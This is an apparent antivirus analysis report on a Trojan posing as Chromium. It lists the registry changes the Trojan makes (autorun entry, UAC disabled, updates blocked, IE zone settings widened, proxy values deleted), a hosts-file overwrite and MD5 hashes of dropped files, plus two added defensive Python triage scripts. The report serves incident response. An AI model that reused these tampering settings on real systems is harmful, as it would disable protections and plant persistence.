[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

User Account Control is disabled by policy (no effect on the Windows XP analysis host, but it turns off UAC prompts on Windows Vista and later):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 74 8A 87 1E C4 69 C0 B8 A5 90 6B 82 78 3F CE"

Google Update is disabled by policy, so the Chrome installation whose files the Trojan rewrote under %Program Files% will no longer receive updates:

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE security-zone settings so that all network paths (UNCs) are treated as part of the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

To run automatically each time the user logs on, the Trojan adds a reference to its dropped file to the per-user autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Google Chromium" = "%Documents and Settings%\%current user%\Application Data\Chromium.exe"

The Trojan modifies IE security-zone settings so that all sites that bypass the proxy server are treated as part of the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings so that all local (intranet) sites not listed in other zones are treated as part of the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
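
The hosts-file overwrite (%System%\drivers\etc\hosts, 269066 bytes, written by Chromium.exe:1116) and the registry changes above are the artifacts an incident responder would triage first. The following Python is an added example, not part of the Lavasoft report: it parses a hosts file for hijack and sinkhole entries and matches a registry snapshot against the values listed above. The sample hosts text, the snapshot and the list of protected domain suffixes are constructed for the demonstration.

```python
"""Check a hosts file and a registry snapshot against the indicators listed
above. Added example, not part of the Lavasoft report; the hosts text, the
snapshot and the protected-suffix list are constructed for the demonstration."""
from typing import Dict, List, Tuple

LOOPBACK = {"127.0.0.1", "0.0.0.0", "::1"}

# Domains a malicious hosts file commonly sinkholes to keep AV and OS updates
# from reaching the machine. Illustrative list, not taken from the report.
PROTECTED_SUFFIXES = (
    "windowsupdate.com", "update.microsoft.com",
    "kaspersky.com", "emsisoft.com", "lavasoft.com",
)

# Registry values Chromium.exe:1116 sets in the report: (key, value name, data).
# data None means any data counts (the Run entry carries a user-specific path).
REPORT_REGISTRY_IOCS = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "Google Chromium", None),
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", "EnableLUA", "0"),
    (r"HKLM\SOFTWARE\Policies\Google\Update", "UpdateDefault", "0"),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap", "UNCAsIntranet", "1"),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap", "ProxyBypass", "1"),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap", "IntranetName", "1"),
]


def parse_hosts(text: str) -> List[Tuple[str, str]]:
    """(address, hostname) pairs; comments, blank lines and alias lists handled."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        addr, *names = line.split()
        entries.extend((addr, n.lower()) for n in names)
    return entries


def hosts_findings(text: str) -> Dict[str, List[str]]:
    """'redirect': names sent to a non-loopback address (traffic hijack);
    'sinkholed': update/AV names pinned to loopback (update suppression)."""
    findings = {"redirect": [], "sinkholed": []}
    for addr, name in parse_hosts(text):
        if addr not in LOOPBACK:
            findings["redirect"].append(f"{name} -> {addr}")
        elif name.endswith(PROTECTED_SUFFIXES):
            findings["sinkholed"].append(name)
    return findings


def registry_findings(snapshot: Dict[str, Dict[str, str]]) -> List[str]:
    """snapshot maps key path -> {value name: data}; keys and value names are
    compared case-insensitively, as the registry itself does."""
    norm = {k.lower(): {vn.lower(): d for vn, d in vals.items()} for k, vals in snapshot.items()}
    hits = []
    for key, name, data in REPORT_REGISTRY_IOCS:
        vals = norm.get(key.lower(), {})
        if name.lower() in vals and (data is None or vals[name.lower()] == data):
            hits.append(f"{key}\\{name} = {vals[name.lower()]}")
    return hits


# Constructed inputs standing in for the real hosts file and a `reg export`.
SAMPLE_HOSTS = """# constructed sample, not the 269066-byte file from the report
127.0.0.1       localhost
127.0.0.1       www.kaspersky.com
127.0.0.1       update.microsoft.com download.windowsupdate.com   # blocks patching
192.0.2.10      www.example-bank.test
"""

SAMPLE_SNAPSHOT = {
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run":
        {"Google Chromium": r"C:\Documents and Settings\user\Application Data\Chromium.exe"},
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system": {"EnableLUA": "0"},
    r"HKLM\SOFTWARE\Policies\Google\Update": {"UpdateDefault": "0"},
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap":
        {"UNCAsIntranet": "1", "ProxyBypass": "1", "IntranetName": "1"},
}

if __name__ == "__main__":
    print(hosts_findings(SAMPLE_HOSTS))
    for hit in registry_findings(SAMPLE_SNAPSHOT):
        print(hit)
```

A hosts file of this size is itself a signal: a stock Windows XP hosts file is under a kilobyte, so a 260 KB one almost always carries a blocklist of security and update domains, which is why the check reports sinkholed names and not only redirects.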

The process wget.exe:612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA B5 C7 84 55 C6 65 18 D8 1A AD 49 8D A3 42 F9"

The process arsiv.exe:792 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 6A B0 D1 83 7C EC 7D F6 17 EB F1 25 F0 2C F7"

The process %original file name%.exe:1676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC AC 18 DF C1 D5 6E 61 C5 72 C8 E0 7A 3B 0A 64"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\RarSFX0]
"Installer.exe" = "Adobe Installation Helper"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies the IE security-zone map so that all local (intranet) sites not listed in another zone are treated as part of the Local Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies the IE security-zone map so that UNC paths are treated as part of the Local Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies the IE security-zone map so that sites which bypass the proxy server are treated as part of the Local Intranet zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
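
The registry changes listed above (an autorun entry pointing into the user's Application Data folder, the three ZoneMap flags, ProxyEnable set to 0 and the deleted proxy values) are the kind of findings a responder wants pulled out of a report automatically rather than read line by line. The following Python is an added example, not part of the Lavasoft report or of the sample's own code: it parses the report's own `[key]` / `"name" = "data"` listing notation (a bare `"name"` under a key is read as a deletion, as in the "deletes the following value(s)" block) and applies three triage rules. The sample text is constructed from the entries shown above; the rule names, the list of user-writable path tokens and the wording of the findings are the example's own choices.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample: the entries from the Chromium.exe block above, in the
# report's own notation ("%Documents and Settings%" etc. are its placeholders),
# followed by the three deleted proxy values.
SAMPLE_REPORT = r'''
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Google Chromium" = "%Documents and Settings%\%current user%\Application Data\Chromium.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
'''

Entry = Tuple[str, str, Optional[str]]  # (key, value name, data; None = deleted)

KEY_RE = re.compile(r'^\[(.+)\]$')
SET_RE = re.compile(r'^"([^"]+)"\s*=\s*"(.*)"$')
DELETE_RE = re.compile(r'^"([^"]+)"$')

def parse_report(text: str) -> List[Entry]:
    """Turn the report's [key] / "name" = "data" listing into entries; a bare "name" is a deletion."""
    entries: List[Entry] = []
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        if key is None:
            continue
        m = SET_RE.match(line)
        if m:
            entries.append((key, m.group(1), m.group(2)))
            continue
        m = DELETE_RE.match(line)
        if m:
            entries.append((key, m.group(1), None))
    return entries

# Rule inputs (the example's own lists; extend to taste).
RUN_KEYS = ('\\currentversion\\run', '\\currentversion\\runonce')
USER_WRITABLE = ('application data', 'appdata', 'local settings', '\\temp\\')
ZONEMAP_FLAGS = {
    'IntranetName': 'local sites not assigned to another zone are treated as Local Intranet',
    'UNCAsIntranet': 'UNC paths are treated as Local Intranet',
    'ProxyBypass': 'sites that bypass the proxy are treated as Local Intranet',
}
PROXY_VALUES = ('AutoConfigURL', 'ProxyServer', 'ProxyOverride')

def triage(entries: List[Entry]) -> List[str]:
    """Three rules: autorun from a user-writable path, widened Intranet zone, proxy tampering."""
    findings = []
    for key, name, data in entries:
        k = key.lower()
        if data is None:
            if k.endswith('\\internet settings') and name in PROXY_VALUES:
                findings.append(f'proxy: {name} deleted')
        elif k.endswith(RUN_KEYS) and any(tok in data.lower() for tok in USER_WRITABLE):
            findings.append(f'persistence: {name} -> {data}')
        elif k.endswith('\\internet settings\\zonemap') and name in ZONEMAP_FLAGS and data == '1':
            findings.append(f'ie-zone: {name}=1 ({ZONEMAP_FLAGS[name]})')
        elif k.endswith('\\internet settings') and name == 'ProxyEnable' and data == '0':
            findings.append('proxy: ProxyEnable=0 (system proxy disabled)')
    return findings

def triage_report(text: str) -> List[str]:
    """Convenience wrapper: parse then triage."""
    return triage(parse_report(text))

if __name__ == '__main__':
    for finding in triage_report(SAMPLE_REPORT):
        print(finding)
```

The persistence rule deliberately keys on where the autorun target lives rather than on its name: a Run value called "Google Chromium" that points into Application Data is suspicious, while the same name pointing into Program Files would not trip this rule.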

Dropped PE files

MD5 File path
b19df3b6eda0aee0cabc75c0ad1599b3 c:\Documents and Settings\"%CurrentUserName%"\Application Data\Chromium.exe
0c4950e06182df940d3e841551aa4378 c:\Documents and Settings\"%CurrentUserName%"\Application Data\arsiv.exe
6044cc9167a451ca32589929d9ab63af c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\am.dll
0f056951ebed5fabecbf611640b8d45f c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\ar.dll
9d415e1843eef10ee34013d53c9ceb44 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\bg.dll
10a1d2d0fbb8bff5d62ab92112f37a54 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\bn.dll
4b3c6816259d6c6a0af983a9ed93ce16 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\ca.dll
c604153cb0fab69301db0f7f30f74760 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\cs.dll
d072eff41659891528d6a6f2a1f4812a c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\da.dll
f221ea188f8d30889c913d82e263b650 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\de.dll
43502f260da31980820df3095c55affe c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\el.dll
d88792584ea6c3e6ca29b9b41f8c91c5 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\en-GB.dll
6e86f87dafae93715572515d6a1ecf10 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\en-US.dll
804786e0c1c0ba2bf0d083b41b7c54fd c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\es-419.dll
a78d8a519e902d6721b720fb58fbe6e8 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\es.dll
4159160dc24c2ee9a62ef469c58def92 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\et.dll
a5b42a9a795eeaaf121105c0ee65d2f3 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\fa.dll
cf3e4ce598af12ce61845fb2df726bbf c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\fi.dll
807c447523ce3b725885536e42cdae6d c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\fil.dll
7422c04a3eb816b3d6c6509cfa8619cf c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\fr.dll
c812b05ff45cecd9bd03352a67786fec c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\gu.dll
7d1d073eaee9371ced3b91cfb5fea4e3 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\he.dll
07f7a71fd29b05d4fbeb2e5e0fcd7787 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\hi.dll
ce9d9574c5257a1b44254d6ec41e27ae c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\hr.dll
b706526605525c987544250dfd530d69 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\hu.dll
0ea483b13f28ea53e70e5b4e431dae8c c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\id.dll
62148930759b904b9ba522889fae973b c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\it.dll
49c0cbdd28f57ce31e7a0531195d3178 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\ja.dll
bfa78421f52457843855e320473e9e53 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\kn.dll
bf0cfc30b19880cfa00cfafcf6011d03 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\ko.dll
bbb3436a5797dc30d6ddb541db0a61b7 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\lt.dll
3043f1246714cd8d04bbc68b6a454d59 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\lv.dll
5405196f1450ae03b0f06b97d4361dcd c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\ml.dll
7e683ca160dc2af79bd111dc81e2985c c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\mr.dll
e72ee2eb6b49b09e498ef0570bd917b9 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\ms.dll
0b6e0b1f2f472d97befb305bd5ef2b43 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\nb.dll
d8a0769140dab6fdae60516158000e5a c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\nl.dll
1deee8bc832803fc736ca96c2d9e2cea c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\pl.dll
5eeb7905796ab13ad74f56e5ad16e2f2 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\pt-BR.dll
e052b1af4a987cd507d20be16062495c c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\pt-PT.dll
41dfee324f5ab48ca061194d3ca4de39 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\ro.dll
7f679fa92ff97d7f1fced6c89a98d233 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\ru.dll
2149ba923a655045b78e2a9be0b4f4b2 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\sk.dll
8a3311f82d726423d7efa2fa00cb2acb c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\sl.dll
22eb4f8a03c05c3575b61c955d7b19fd c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\sr.dll
8c4817e470153861ccae6f32eb8f24e1 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\sv.dll
38d0241cebb4ac26289e80f985d3ebef c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\sw.dll
e71c012e0a370ae90ba295f7205b95e6 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\ta.dll
632afa70f9720eb544854f2c553655c5 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\te.dll
0ca85c08971c7fca656b803e0fa6de0e c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\th.dll
96ad4ffef7c5791fa1f3bb3371ac3ef8 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\tr.dll
e1d3ad461c48f57707529003209d00e5 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\uk.dll
e45fb970e7c2fcb1ca91cfd59d2d8dae c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\vi.dll
a3c8afd0b6974cea8502fec0027e591f c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\zh-CN.dll
feb7d00815cc26ee2b50386a08352e36 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\Locales\zh-TW.dll
a087867f590d53248897184ef3e5cfd4 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\PepperFlash\pepflashplayer.dll
2c89a10a4ca6b9abbbe1ea3f61aed2ae c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\chrome.dll
1362a0d7fb57614067035b6dee177989 c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\icudt.dll
e6cb3fa160426172b0baa3d63c8f528a c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\30.0.1573.2\libpeerconnection.dll
c1227e1d33fd329a42295177be88e30b c:\Documents and Settings\"%CurrentUserName%"\Application Data\browser\chrome.exe
6044cc9167a451ca32589929d9ab63af c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\am.dll
0f056951ebed5fabecbf611640b8d45f c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\ar.dll
9d415e1843eef10ee34013d53c9ceb44 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\bg.dll
10a1d2d0fbb8bff5d62ab92112f37a54 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\bn.dll
4b3c6816259d6c6a0af983a9ed93ce16 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\ca.dll
c604153cb0fab69301db0f7f30f74760 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\cs.dll
d072eff41659891528d6a6f2a1f4812a c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\da.dll
f221ea188f8d30889c913d82e263b650 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\de.dll
43502f260da31980820df3095c55affe c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\el.dll
d88792584ea6c3e6ca29b9b41f8c91c5 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\en-GB.dll
6e86f87dafae93715572515d6a1ecf10 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\en-US.dll
804786e0c1c0ba2bf0d083b41b7c54fd c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\es-419.dll
a78d8a519e902d6721b720fb58fbe6e8 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\es.dll
4159160dc24c2ee9a62ef469c58def92 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\et.dll
a5b42a9a795eeaaf121105c0ee65d2f3 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\fa.dll
cf3e4ce598af12ce61845fb2df726bbf c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\fi.dll
807c447523ce3b725885536e42cdae6d c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\fil.dll
7422c04a3eb816b3d6c6509cfa8619cf c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\fr.dll
c812b05ff45cecd9bd03352a67786fec c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\gu.dll
7d1d073eaee9371ced3b91cfb5fea4e3 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\he.dll
07f7a71fd29b05d4fbeb2e5e0fcd7787 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\hi.dll
ce9d9574c5257a1b44254d6ec41e27ae c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\hr.dll
b706526605525c987544250dfd530d69 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\hu.dll
0ea483b13f28ea53e70e5b4e431dae8c c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\id.dll
62148930759b904b9ba522889fae973b c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\it.dll
49c0cbdd28f57ce31e7a0531195d3178 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\ja.dll
bfa78421f52457843855e320473e9e53 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\kn.dll
bf0cfc30b19880cfa00cfafcf6011d03 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\ko.dll
bbb3436a5797dc30d6ddb541db0a61b7 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\lt.dll
3043f1246714cd8d04bbc68b6a454d59 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\lv.dll
5405196f1450ae03b0f06b97d4361dcd c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\ml.dll
7e683ca160dc2af79bd111dc81e2985c c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\mr.dll
e72ee2eb6b49b09e498ef0570bd917b9 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\ms.dll
0b6e0b1f2f472d97befb305bd5ef2b43 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\nb.dll
d8a0769140dab6fdae60516158000e5a c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\nl.dll
1deee8bc832803fc736ca96c2d9e2cea c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\pl.dll
5eeb7905796ab13ad74f56e5ad16e2f2 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\pt-BR.dll
e052b1af4a987cd507d20be16062495c c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\pt-PT.dll
41dfee324f5ab48ca061194d3ca4de39 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\ro.dll
7f679fa92ff97d7f1fced6c89a98d233 c:\Program Files\Google\Chrome\Application\30.0.1573.2\Locales\ru.dll
